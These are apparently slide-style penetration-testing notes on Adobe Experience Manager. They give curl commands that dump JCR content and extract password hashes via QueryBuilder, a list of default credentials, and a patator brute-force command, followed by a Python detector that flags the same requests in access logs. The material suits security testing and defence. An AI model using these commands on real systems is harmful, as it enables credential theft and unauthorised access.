Adobe Experience Manager sites
Related Work
http://resources.infosecinstitute.com/adobe-cq-pentesting-guide-part-1/
http://www.slideshare.net/CQCON/prsentation-ben-zahler
https://docs.adobe.com/docs/en/aem/6-0/administer/security/securitychecklist.html
What do we want
Sensitive information from JCR
Installed OSGI bundles
Custom scripts
Usernames
Password hashes
Elements that allow anonymous modification
curl -X GET http://127.0.0.1:8080/.json
curl -X GET http://127.0.0.1:8080/.6.json
curl -X GET http://127.0.0.1:8080/.tidy.6.json
curl -X GET http://127.0.0.1:8080/.tidy.infinity.json
curl -X GET http://127.0.0.1:8080/bin.tidy.infinity.json
curl -X GET http://127.0.0.1:8080/bin/querybuilder.json
Custom scripts
List custom scripts
curl -X GET http://127.0.0.1:8080/apps.tidy.infinity.json
curl -X GET http://127.0.0.1:8080/var/classes.tidy.infinity.json
Usernames
Dump content node properties
curl -X GET http://127.0.0.1:8080/content.infinity.json
Password hashes
Use QueryBuilder bundle
curl -X GET "http://127.0.0.1:8080/bin/querybuilder.json?type=rep:User&p.hits=selective&p.properties=rep:principalName%20rep:password&p.limit=100"
Anonymous modification
Dump content node properties
curl -X GET http://127.0.0.1:8080/content.infinity.json
Getting access
Try default user credentials: admin/admin, author/author, anonymous/anonymous
Offline attack (brute hashes)
Online attack (POST servlet bundle)
patator http_fuzz url=http://127.0.0.1:8080/content/fake.json method=POST user_pass=FILE0:FILE1 0=users.txt 1=pass.txt auth_type=basic -x ignore:code!=200 --threads 5
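From the defender's side, the requests listed above leave distinctive traces in the dispatcher or AEM access log. The following added example (not part of the original slides) runs simple detection logic over constructed log lines: subtree dumps via Sling depth selectors, QueryBuilder queries for rep:User / rep:password, and repeated failed POSTs to a .json path from one client. The log format, sample IPs and the failure threshold are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample lines in Apache combined log format; not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /.tidy.infinity.json HTTP/1.1" 200 8421 "-" "curl/7.68.0"
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /bin/querybuilder.json?type=rep:User&p.hits=selective&p.properties=rep:principalName%20rep:password&p.limit=100 HTTP/1.1" 200 2048 "-" "curl/7.68.0"
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /content/site/en.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /bin/querybuilder.json?type=cq:Page&path=/content/site HTTP/1.1" 200 900 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "POST /content/fake.json HTTP/1.1" 401 0 "-" "python-requests/2.25"
10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "POST /content/fake.json HTTP/1.1" 401 0 "-" "python-requests/2.25"
10.0.0.7 - - [01/Jan/2024:10:00:06 +0000] "POST /content/fake.json HTTP/1.1" 401 0 "-" "python-requests/2.25"
10.0.0.7 - - [01/Jan/2024:10:00:06 +0000] "POST /content/fake.json HTTP/1.1" 401 0 "-" "python-requests/2.25"
10.0.0.7 - - [01/Jan/2024:10:00:07 +0000] "POST /content/fake.json HTTP/1.1" 401 0 "-" "python-requests/2.25"
"""

LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
# Sling depth selectors that dump whole subtrees: .N.json, .infinity.json, .tidy.infinity.json
TREE_DUMP = re.compile(r"\.(?:tidy\.)?(?:infinity|\d+)\.json$")
# QueryBuilder queries that target user nodes or credential properties
USER_QUERY = re.compile(r"rep:(?:User|password|principalName)", re.IGNORECASE)
AUTH_FAIL_THRESHOLD = 5  # assumed: failed POSTs from one client before flagging a spray

def analyze(log_text, threshold=AUTH_FAIL_THRESHOLD):
    """Return a list of (client_ip, finding, target) tuples for suspicious requests."""
    findings = []
    failed_posts = defaultdict(int)
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, method, target, status = m.groups()
        path, _, query = target.partition("?")
        if method == "GET" and TREE_DUMP.search(path):
            findings.append((ip, "jcr-tree-dump", path))
        if path == "/bin/querybuilder.json" and USER_QUERY.search(unquote(query)):
            findings.append((ip, "querybuilder-user-enum", target))
        if method == "POST" and path.endswith(".json") and status in ("401", "403"):
            failed_posts[ip] += 1
            if failed_posts[ip] == threshold:  # report once per client
                findings.append((ip, "post-servlet-auth-spray", path))
    return findings

if __name__ == "__main__":
    for ip, finding, target in analyze(SAMPLE_LOG):
        print(f"{ip:12} {finding:26} {target}")
```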
Inbound exploitation
Pros: you do not need an external server; more stable
Cons: you need the credentials of a user that is able to modify some node in the JCR
http://www.youtube.com/watch?v=Hg3AXoG89Gs
http://www.youtube.com/watch?v=Z9n2T07e6Ls
Ask a Ninja